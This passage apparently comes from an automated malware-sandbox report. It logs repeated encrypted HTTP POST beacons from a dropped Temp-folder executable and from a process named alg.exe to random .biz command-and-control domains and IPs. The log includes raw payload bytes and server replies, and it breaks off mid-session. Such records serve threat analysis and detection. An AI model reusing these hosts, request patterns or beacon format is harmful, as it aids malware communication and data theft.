                                                                                                                                                                                                                                                                                                                                                    Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:23.586184025 CET778OUTData Raw: b7 0a 98 8e 3c 2d 5b ff fe 02 00 00 a0 a5 01 b7 9a 33 b5 3c 3f 5e 6c 38 4c b4 41 94 c8 6a 91 40 63 5b 19 5c ea 58 6c 42 82 5a 6f a9 3e 64 52 2d d3 e9 0f ef 80 09 11 e2 ba 08 9f 0a c4 89 2a b6 d1 d1 3f 61 76 b7 90 5d c4 dd a9 10 46 6b ff fc d0 9a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <-[3<?^l8LAj@c[\XlBZo>dR-*?av]Fk'")O@/AM6AGv1M;(enjevjRXX\"y,ohPSex{bKE< $[gCn?g"#a[Bt%6Idx.<+cBDL
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.689496040 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:25 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c817d9dbc0ffdc4933e692e61006c457|8.46.123.75|1732605325|1732605325|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    82192.168.2.105006518.246.231.120807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.357831001 CET354OUTPOST /txgdoagkkmvqc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.357831001 CET834OUTData Raw: 3b 99 cb c5 dd 71 4d 62 36 03 00 00 4f 6c 2b fc 59 a2 77 47 56 5d 41 86 66 43 59 95 9a 54 00 26 09 b1 ff ac e8 c7 95 5c a2 d5 04 fa 06 45 19 e2 68 1d 17 a1 aa ab d3 26 3b 99 de 91 65 a3 d9 bc 88 1e ee 94 13 c8 89 f9 fe 7c 7f 84 77 2a c7 1f 2b fd
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;qMb6Ol+YwGV]AfCYT&\Eh&;e|w*+P">x~@(7x4^dOa487H-<d"B:s/c].NqKIo*U>v\GQWW%/AfS+<7qRsn_u[
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.771281958 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:26 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c14ae9a3bb6ed279c2c3b78cd6948879|8.46.123.75|1732605326|1732605326|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    83192.168.2.105006634.211.97.45806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.132034063 CET354OUTPOST /wmyvrothcg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.132070065 CET778OUTData Raw: 7d b4 b9 9a 56 76 c8 af fe 02 00 00 9f 1d a3 ca 3f a6 d3 99 c7 7b be bb ae b4 7a 62 09 3d c3 85 7f cd e0 a6 af b2 c7 60 3c e7 fb bf 5d 83 5c f4 2d 21 21 11 78 18 04 41 90 3c e7 89 49 aa d7 e5 00 c0 5a 5c 3b df f8 8d 07 1f e8 b4 38 7c 03 69 c2 23
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: }Vv?{zb=`<]\-!!xA<IZ\;8|i#aA9!4F23&.8M1GeH~iId[K\f-5&DV73!"skV[{{e}{!pw C "c/NL9
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:27.584552050 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:27 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=ecf3e952dde18ca22d545aa05e7af735|8.46.123.75|1732605327|1732605327|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    84192.168.2.105006718.208.156.248807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:27.039500952 CET351OUTPOST /dqpygue HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:27.039592981 CET834OUTData Raw: 56 36 c3 c0 46 f1 2c f4 36 03 00 00 3f c8 4b 27 ff 4b 57 4d a5 16 82 96 0c d7 1e b3 2d db cb 94 27 88 36 76 8a 16 3f e4 a1 f5 e8 d2 5b 7a 92 d7 00 62 6f 88 69 e0 a6 ce 0a 1b 53 03 4c 39 d0 50 c4 30 69 5a b1 09 cd a7 38 62 41 3a 0c fb 9b 35 85 75
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: V6F,6?K'KWM-'6v?[zboiSL9P0iZ8bA:5uQ!bDwH/S}>{H`Zr~*F{ 4_fvf~nN4'H16?ZN2'O2*1!.Q}-jX8,g2!;
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.243186951 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:28 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=a6d45d8b90873077c979786a2a748de5|8.46.123.75|1732605328|1732605328|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    85192.168.2.105006847.129.31.212806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.285382032 CET352OUTPOST /ubrpiugbci HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.285406113 CET778OUTData Raw: 49 d8 e8 b1 d5 9f 95 e5 fe 02 00 00 22 f1 d4 6d 09 14 dd a8 b3 cd e6 02 41 b5 29 51 9b 7f 40 80 d5 76 75 03 cb 28 60 86 01 69 e4 85 4e b4 b8 90 07 9d 96 1a a7 f4 47 98 14 fe 51 5f b7 99 27 20 2c 5a 25 45 5b 78 f1 25 f1 3f 31 48 dd 12 ed d7 10 01
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: I"mA)Q@vu(`iNGQ_' ,Z%E[x%?1HaLLJFq:boTG\?DScdw%gp.EeU-#Sir!Pifb4RtiVE]C-5}@P
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.391016006 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:30 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=53cc70f77eefd70c7cfb6a5d8c11153c|8.46.123.75|1732605329|1732605329|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    86192.168.2.105006913.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.518765926 CET355OUTPOST /qjkfpfdycqfln HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.518812895 CET834OUTData Raw: 2c 6f 84 5b 84 2a 45 80 36 03 00 00 18 6a 81 2f f3 54 44 6d 6d 30 85 da 2c 8d 55 f0 a6 c9 7e 55 fc aa a7 a8 7e 28 1f 5a df 3b 15 cd 5c 28 27 fe 6d 2f ee 23 80 84 43 5b a0 1c 4e d0 7b f9 66 e9 56 e5 b2 33 1f 7d 0c f0 2f 99 0d b6 aa 4f 07 71 34 86
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,o[*E6j/TDmm0,U~U~(Z;\('m/#C[N{fV3}/Oq4[67FXIg3eqk0t0p*NKgnev>_S39!S{??UMYbU:!~RAX07j&%z`w-tp#pNgCK6Hc
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.673027992 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:30 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=048dcf7d202d129ff868d168b4dba761|8.46.123.75|1732605330|1732605330|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    87192.168.2.105007013.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.822477102 CET358OUTPOST /vauoordpmpgaykv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.822477102 CET778OUTData Raw: de b7 4f c7 91 d3 a4 1b fe 02 00 00 01 e7 65 eb fb 4f d0 98 22 e8 1d 4f fb e8 5c 95 6c 22 cf 48 1e f5 7a f5 4a 51 c4 36 e6 b5 7c 9c 44 2a 03 22 eb c6 ea 8c 2f c6 cd e4 36 08 2f b4 f6 11 64 35 2e d2 d1 62 9a 79 c7 91 dc 7c 78 1a f0 da c7 e9 65 b9
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: OeO"O\l"HzJQ6|D*"/6/d5.by|xe!sGq*h^iJ?M||*m@\{pSWu%VB=i^wTM4+6->K0y?{lcu%zgot y;M<;=epL'
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:32.926733017 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:32 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=fd12138a80fa3b56fc27f0f9ab01a44e|8.46.123.75|1732605332|1732605332|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    88192.168.2.105007113.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.948832989 CET348OUTPOST /vtk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.948910952 CET834OUTData Raw: 77 52 2f 7a 64 f2 53 3e 36 03 00 00 60 e3 74 2d 44 0a 06 28 e4 b1 03 3b 93 be f7 d3 ba 26 d6 b4 58 9c 92 59 0c 70 35 f7 2c 74 d2 f1 f6 d8 ee 2f ee 78 70 ba 37 05 c2 e1 6d dd ac 2c 8c 61 cd 66 a4 90 69 41 21 f1 74 35 30 06 17 96 a7 ff 8c 4c 5c c3
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: wR/zdS>6`t-D(;&XYp5,t/xp7m,afiA!t50L\zpp?bl<57b=Nz`y %NNQ{+:(R~BskmD[]%Z3dTTk_rQDf(^?|kZ%vA6n+a
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.097506046 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:32 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=8856a80de75b5b2a7067edb1ad09843b|8.46.123.75|1732605332|1732605332|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    89192.168.2.105007234.211.97.45807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.373687029 CET356OUTPOST /jsmhknoucgib HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.373714924 CET834OUTData Raw: 3b 68 a6 50 14 b3 7f d1 36 03 00 00 4c 5b 6b 2c d4 64 d2 02 9a 30 23 82 3e 14 33 4a de 92 a6 30 3c ba 1f 07 95 4f b1 39 8d 76 ac c1 aa 7f c0 23 fe 83 a3 94 5f 86 0a 12 b6 13 fa 00 73 b0 32 93 ee 0a ba e6 34 35 92 0b 7d 41 f3 1e f2 54 5e 2e 11 9d
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;hP6L[k,d0#>3J0<O9v#_s245}AT^.=hB4\Fs3P2\#aH^P?gkYT4AG1*raEl@4F8bO5La0$^8dg&p3]thA]/84G=#6}X
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.734556913 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:34 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=e9acaa48f6888ed69424f6aa635b0726|8.46.123.75|1732605334|1732605334|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    90192.168.2.105007334.211.97.45806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.645860910 CET350OUTPOST /udyyttdfi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.645891905 CET778OUTData Raw: 08 a6 6f 1c 28 3a 19 2c fe 02 00 00 a4 9e 16 6c 65 a7 d6 03 e6 85 9e ef ef f6 93 08 a8 6e a4 5e 03 88 64 b7 35 54 49 c0 c2 ec 8e 73 45 11 e7 40 a4 58 7c be d7 f0 cb 5f 93 06 e4 30 fd 63 01 bd 32 76 d5 86 0b 65 95 ff 37 8e ce e6 ca e4 91 a5 da c4
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o(:,len^d5TIsE@X|_0c2ve7O`US}WO+n0wL(w3Ta|cQSqFeuP?_]w|ws$0o+[A:)k|/IG"rX=7]oj`]
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.974289894 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:34 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=35ba5822ddb0230a71e9639c312c313e|8.46.123.75|1732605334|1732605334|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    91192.168.2.105007447.129.31.212807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.005057096 CET348OUTPOST /rvwkmk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.005088091 CET834OUTData Raw: e5 04 c2 eb 38 25 52 a0 36 03 00 00 32 3f b5 64 1d b9 3a 96 61 2d 19 fa 11 9e 20 4c 09 df e1 b5 82 43 cc 4a 1a 20 4c 4f 51 0d f7 87 67 cf b0 94 42 98 84 1f 09 52 d8 93 a6 0e 64 7f 12 7c 42 4f 3c 87 82 a5 17 ae 10 51 76 a1 28 fe df a6 fc 47 0f 2f
